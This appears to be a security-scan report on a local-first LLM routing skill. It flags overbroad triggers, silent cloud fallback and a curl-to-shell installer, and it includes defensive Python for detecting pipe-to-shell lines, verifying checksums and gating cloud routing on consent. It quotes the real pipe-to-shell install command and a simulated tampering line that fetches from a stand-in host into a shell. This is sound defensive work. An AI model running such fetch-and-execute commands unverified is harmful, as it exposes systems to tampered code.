Local-First LLM

Security checks across malware telemetry and agentic risk

Overview

This looks like a coherent local-first LLM routing utility, with some disclosure and installation cautions but no artifact-backed evidence of malicious behavior.

Before installing, confirm whether cloud fallback is enabled and use a local-only mode for sensitive prompts if one is available. Do not run the documented curl-to-shell installer blindly: prefer a package manager or a signed release, or download the script, review it and verify its checksum against a value published through a trusted channel before running it.
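Two of these checks in code, as an added example that is not part of the skill's documentation or of Ollama's installer: a scanner that finds pipe-to-shell lines in a skill's install text, and a fetch-verify-run replacement for `curl ... | sh`. The regex, the helper names and the pinned digest (which belongs to a constructed file, not to any real installer) are assumptions of this example.

```python
"""Added example (not code from the skill or from Ollama): detect `curl ... | sh`
in install docs, and replace it with fetch, verify against a pinned SHA-256, run."""
import hashlib
import hmac
import os
import re
import subprocess
import tempfile
import urllib.request

# Download command whose output is piped straight into a shell interpreter.
# The trailing \b after `sh` keeps `| sha256sum -c` from being flagged.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")

# Excerpt of the skill's install instructions as quoted in the report.
SKILL_EXCERPT = """brew install ollama

# Linux
curl -fsSL https://ollama.ai/install.sh | sh
"""


def is_pipe_to_shell(line: str) -> bool:
    """True if one line pipes fetched content into sh/bash/zsh/dash."""
    return PIPE_TO_SHELL.search(line) is not None


def find_pipe_to_shell(text: str) -> list:
    """Every pipe-to-shell line in a block of documentation, stripped."""
    return [ln.strip() for ln in text.splitlines() if is_pipe_to_shell(ln)]


def sha256_file(path: str) -> str:
    """Hex SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_sha256(path: str, expected_hex: str) -> bool:
    """Constant-time comparison of the file digest against a pinned value."""
    return hmac.compare_digest(sha256_file(path), expected_hex.strip().lower())


def install_from_url(url: str, expected_sha256: str, runner=("sh",)) -> None:
    """Download to disk, verify against a digest pinned from a trusted channel
    (release notes, a signed checksum file), and only then execute it.
    The expected digest is supplied by the caller; nothing runs on a mismatch.
    Needs network access, so the offline demo below does not call it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "install.sh")
        urllib.request.urlretrieve(url, path)  # to a file, never to a shell
        if not verify_sha256(path, expected_sha256):
            raise RuntimeError(f"checksum mismatch for {url}; refusing to run")
        subprocess.run([*runner, path], check=True)


def demo() -> dict:
    """Offline demonstration on a constructed installer file: verify passes
    against the pinned digest, then fails once the file has been tampered with."""
    pinned = "5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03"  # sha256 of b"hello\n"
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "install.sh")
        with open(path, "wb") as f:
            f.write(b"hello\n")  # constructed installer body
        before = verify_sha256(path, pinned)
        with open(path, "ab") as f:  # simulated tampering in transit or at the origin
            f.write(b"curl -s http://example.invalid/x | sh\n")
        after = verify_sha256(path, pinned)
    return {"verified": before, "verified_after_tamper": after,
            "flagged_lines": find_pipe_to_shell(SKILL_EXCERPT)}


if __name__ == "__main__":
    print(demo())
```

The point of `install_from_url` is ordering: the bytes land on disk, are compared against a digest obtained out of band, and only then reach an interpreter, so a modified script at the origin or on the wire is rejected rather than executed. `find_pipe_to_shell` is the check to run over a skill's SKILL.md before trusting its setup steps.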

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool Misuse: Tool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (5)

Vague Triggers

Severity: Medium
Confidence: 91%
Finding: The description includes broad triggers such as 'any request where local-vs-cloud routing should be decided automatically,' which can cause the skill to auto-invoke in many unrelated contexts. Overbroad invocation increases the chance that prompts are intercepted, rerouted, logged, or sent to external providers when the user did not explicitly request this behavior.

Missing User Warnings

Severity: Medium
Confidence: 96%
Finding: The skill advertises privacy and local-first routing, but it does not clearly warn users that prompts may be sent to cloud APIs on fallback. This omission is dangerous because users may provide sensitive data under the assumption it will stay local, only for it to be transmitted externally when local routing fails or complexity rules choose cloud.

Missing User Warnings

Severity: Medium
Confidence: 90%
Finding: This script automatically routes prompts to the cloud when no local provider is available or when the prompt is deemed complex, but it provides no user-facing disclosure or consent mechanism before potentially transmitting user content off-device. In a skill explicitly marketed for privacy and local-first routing, silent cloud fallback can expose sensitive or regulated data if keyword-based detection misses it or the user assumes all prompts remain local.
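The two warnings above describe one behaviour: a routing decision that can move a prompt off-device with nothing shown to the user. The following added example, which is not the skill's code, puts the silent version next to a disclosed one so the difference is concrete. The complexity rule, the keyword-based sensitivity pattern, the `consent` callback and all names are assumptions of this example; the hardened router refuses cloud routing when no consent hook is wired in, when local-only mode is set, or when the prompt matches the sensitivity pattern, and records every decision with its reason.

```python
"""Added example, not the skill's code: silent cloud fallback (as the finding
describes it) beside a disclosed, consent-gated router. Heuristics are assumed."""
import re
from dataclasses import dataclass, field
from typing import Callable, List, Optional


class CloudFallbackRefused(RuntimeError):
    """Routing would have sent the prompt off-device without permission."""


# Assumed keyword-based detector; the finding notes such detection can miss data,
# which is why consent and local-only mode are the primary controls, not this.
SENSITIVE = re.compile(
    r"(?i)\b(password|api[-_ ]?key|secret|ssn|patient|diagnosis)\b|\b\d{3}-\d{2}-\d{4}\b")


def looks_complex(prompt: str) -> bool:
    """Assumed complexity rule: long or multi-step prompts are sent to cloud."""
    return len(prompt.split()) > 200 or "step by step" in prompt.lower()


@dataclass
class Router:
    local_available: bool
    cloud_fallback: bool = True                        # the skill's apparent default
    local_only: bool = False                           # the mode the overview recommends
    consent: Optional[Callable[[str], bool]] = None    # hypothetical UI hook: reason -> yes/no
    decisions: List[str] = field(default_factory=list) # audit trail of where prompts went

    def _cloud_reason(self, prompt: str) -> Optional[str]:
        """Why the prompt would leave the device, or None if it stays local."""
        if not self.local_available:
            return "no local provider available"
        if looks_complex(prompt):
            return "prompt classified as complex"
        return None

    def route_silent(self, prompt: str) -> str:
        """The behaviour the finding describes: cloud chosen with no disclosure."""
        return "cloud" if self._cloud_reason(prompt) else "local"

    def route_disclosed(self, prompt: str) -> str:
        """Hardened routing: refuse-by-default for anything leaving the device."""
        reason = self._cloud_reason(prompt)
        if reason is None:
            self.decisions.append("local: routed locally")
            return "local"
        if self.local_only or not self.cloud_fallback:
            self.decisions.append(f"refused: {reason}; cloud fallback disabled")
            raise CloudFallbackRefused(self.decisions[-1])
        if SENSITIVE.search(prompt):
            self.decisions.append(f"refused: {reason}; prompt matched sensitivity pattern")
            raise CloudFallbackRefused(self.decisions[-1])
        if self.consent is None or not self.consent(reason):
            self.decisions.append(f"refused: {reason}; no user consent")
            raise CloudFallbackRefused(self.decisions[-1])
        self.decisions.append(f"cloud: {reason}; user consented")
        return "cloud"


def decide(router: Router, prompt: str) -> str:
    """Convenience wrapper returning 'local', 'cloud' or 'refused'."""
    try:
        return router.route_disclosed(prompt)
    except CloudFallbackRefused:
        return "refused"


if __name__ == "__main__":
    r = Router(local_available=False)
    print("silent:", r.route_silent("my password is hunter2"))     # cloud, no warning
    print("disclosed:", decide(r, "my password is hunter2"))       # refused
    print(r.decisions)
```

The difference that matters is the default: with no local provider, `route_silent` returns `cloud` for every prompt, while `route_disclosed` returns `cloud` only when a consent hook exists and says yes, and never for a prompt that matches the sensitivity pattern or when `local_only` is set.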

External Script Fetching

Severity: High
Category: Supply Chain
Content (excerpt from the skill's install instructions):
```
brew install ollama

# Linux
curl -fsSL https://ollama.ai/install.sh | sh
```
**Start server**
Confidence: 98%
Finding: `curl -fsSL https://ollama.ai/install.sh | sh`

Chaining Abuse

Severity: High
Category: Tool Misuse
Content (excerpt from the skill's install instructions):
```
brew install ollama

# Linux
curl -fsSL https://ollama.ai/install.sh | sh
```
**Start server**
Confidence: 97%
Finding: `| sh` (the fetched script is chained directly into a shell)

VirusTotal

64/64 vendors reported this skill as clean.
